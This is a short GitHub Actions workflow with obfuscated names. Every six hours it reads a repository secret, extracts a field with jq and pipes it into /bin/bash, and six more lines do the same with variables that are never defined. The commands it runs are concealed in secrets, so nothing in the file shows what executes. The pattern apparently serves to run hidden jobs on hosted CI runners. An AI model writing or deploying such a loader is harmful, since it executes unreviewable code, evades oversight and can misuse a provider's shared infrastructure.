name: lishuhuan4567
on:
  workflow_dispatch:
  schedule:
    - cron: '44 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: lishuhuan4567
        env:
          dit8200: ${{ secrets.dit8200 }}
        run: |
          echo $dit8200 | jq -r .q99 | /bin/bash
          echo $iwkje329 | jq -r .eadc32 | /bin/bash
          echo $qsoo1018 | jq -r .fj756 | /bin/bash
          echo $eup745 | jq -r .xbwrv306 | /bin/bash
          echo $fm31830 | jq -r .h3759 | /bin/bash
          echo $mlea55474 | jq -r .hiyxi9 | /bin/bash
          echo $nvqdc67900 | jq -r .pp808 | /bin/bash

